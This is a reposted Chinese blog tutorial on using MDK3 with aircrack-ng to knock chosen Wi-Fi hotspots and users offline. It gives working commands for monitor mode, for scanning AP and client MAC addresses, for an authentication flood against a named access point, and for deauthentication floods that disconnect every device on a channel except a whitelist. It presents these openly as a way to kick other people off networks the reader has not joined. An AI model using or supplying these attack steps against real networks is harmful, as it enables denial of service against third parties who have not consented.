1. 程式人生 > >無線網絡中,使用MDK3把指定的用戶或者熱點踢到掉線(轉)

無線網絡中,使用MDK3把指定的用戶或者熱點踢到掉線(轉)

欺騙 超過 bsp 信息 code www 參數 參考 wifi熱點

閱讀目錄

  •   準備
  •   驗證洪水攻擊 / Authentication Flood Attack
  •   取消身份驗證攻擊 / Deauth攻擊
  •   參考
回到頂部

  準備

  1:系統環境為ubuntu16.04,

  2:需要mdk3mdk3這個軟件需要通過apt安裝, 需要kali系統的源

  3:需要安裝aircrack-ng套件

  今天這套東西,可以在未連接上靶機網絡的情況下,把別人的機器踢掉線

回到頂部

  驗證洪水攻擊 / Authentication Flood Attack

  驗證洪水攻擊,國際上稱之為Authentication Flood Attack,全稱即身份驗證洪水攻擊,通常被簡稱為Auth攻擊,是無線網絡拒絕服務攻擊的一種形式。該攻擊目標主要針對那些處於通過驗證、和AP建立關聯的關聯客戶端,攻擊者將向AP發送大量偽造的身份驗證請求幀(偽造的身份驗證服務和狀態代碼),當收到大量偽造的身份驗證請求超過所能承受的能力時,AP將斷開其它無線服務連接。

  攻擊指定的wifi熱點, 只要知道wifi熱點的MAC地址即可,

  先把本地網卡設置為混雜模式, wlx001d0f04f093為網卡的名字

運行下面代碼

sudo airmon-ng start wlx001d0f04f093

  通過airodump ,獲取wifi熱點的MAC, 下圖就是附近的所有WIFI信息:

運行下面代碼

sudo airodump-ng mon0

技術分享圖片

  所用MDK3命令,-a 後面的參數為AP的熱點MAC:

運行下面代碼

sudo mdk3 mon0 a -a D4:83:04:9F:37:28

  上面一條命令會循環發送大量驗證信息給AP,過不了幾分鐘,AP就會卡死, 如果路由器有防DOS的功能的話,這個不好用

回到頂部

  取消身份驗證攻擊 / Deauth攻擊

  取消驗證洪水攻擊,國際上稱之為De-authentication Flood Attack,全稱即取消身份驗證洪水攻擊或驗證阻斷洪水攻擊,通常被簡稱為Deauth攻擊,是無線網絡拒絕服務攻擊的一種形式,它旨在通過欺騙從AP到客戶端單播地址的取消身份驗證幀來將客戶端轉為未關聯的/未認證的狀態。對於目前廣泛使用的無線客戶端適配器工具來說,這種形式的攻擊在打斷客戶端無線服務方面非常有效和快捷。一般來說,在攻擊者發送另一個取消身份驗證幀之前,客戶站會重新關聯和認證以再次獲取服務。攻擊者反復欺騙取消身份驗證幀才能使所有客戶端持續拒絕服務。

  攻擊指定的頻道, 讓頻道為 11

所有計算機都掉線: 

運行下面代碼

sudo mdk3 mon0 d -c 11

  只要頻道為11的所有計算機都會掉線

  在本地創建一個白名單的文本文件whiltelist.txt,只要在白名單內部的AP或者客戶機,都可以正常上網:

技術分享圖片

  執行代碼:

運行下面代碼

sudo mdk3 mon0 d -c 11 -w "whitelist.txt"

技術分享圖片

  此時, 除了MAC地址為 50:7A:55:DE:C1:C0 的用戶, 所有的計算機或者移動設備都會被下線, 這個非常好用;

  有些同學會疑惑, 我怎麽拿到受害機器的MAC地址, 在執行 sudo airodump-ng mon0 , 的顯示結果頁下面就有 客戶機的連接消息:

技術分享圖片

回到頂部

  參考

  Mac系統安裝Aircrack-ng破解附近wifi密碼(1) : http://www.cnblogs.com/diligenceday/p/6344487.html

技術分享圖片作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830

心好累啊, 買了一個TP-LINK WDN7200H雙頻高增益無線USB網卡,居然沒有linux下的驅動, 搞了一天了, 吐槽一下

無線網絡中,使用MDK3把指定的用戶或者熱點踢到掉線(轉)